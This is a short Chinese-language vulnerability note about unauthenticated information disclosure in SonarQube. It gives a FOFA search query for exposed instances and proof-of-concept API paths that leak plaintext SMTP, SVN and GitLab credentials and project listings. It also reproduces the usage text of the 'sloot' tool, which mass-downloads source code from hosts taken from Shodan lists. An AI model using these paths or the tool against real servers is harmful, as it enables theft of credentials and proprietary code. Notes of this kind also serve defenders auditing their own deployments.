漏洞描述
SonarQube 某接口存在信息泄露漏洞,可以获取部分敏感信息
漏洞影响
- SonarQube
FOFA
- app=”sonarQube-代码管理”
漏洞复现
漏洞POC
http://xxx.xxx.xxx.xxx/api/settings/values可泄露的为:明文SMTP、SVN和Gitlab等敏感信息
SonarQube search_projects 项目信息泄露漏洞
- app=”sonarQube-代码管理”
POC:验证
http://xxx.xxx.xxx.xxx/api/components/search_projects
可通过工具下载项目中的源代码
https://github.com/deletescape/sloot
Help
Usage of ./sloot:
-alsologtostderr
log to standard error as well as files
-color
colorize the console output (default true)
-log_backtrace_at value
when logging hits line file:N, emit a stack trace
-log_dir string
If non-empty, write log files in this directory
-logtostderr
log to standard error instead of files
-n Doesn't download discovered projects, and only prints info about them
-q Don't print non-fatal errors
-s string
Path to a Shodan download file with hosts to run against
-stderrthreshold value
logs at or above this threshold go to stderr
-v value
log level for V logs
-verbose
Print every file being downloaded
-vmodule value
comma-separated list of pattern=N settings for file-filtered logging
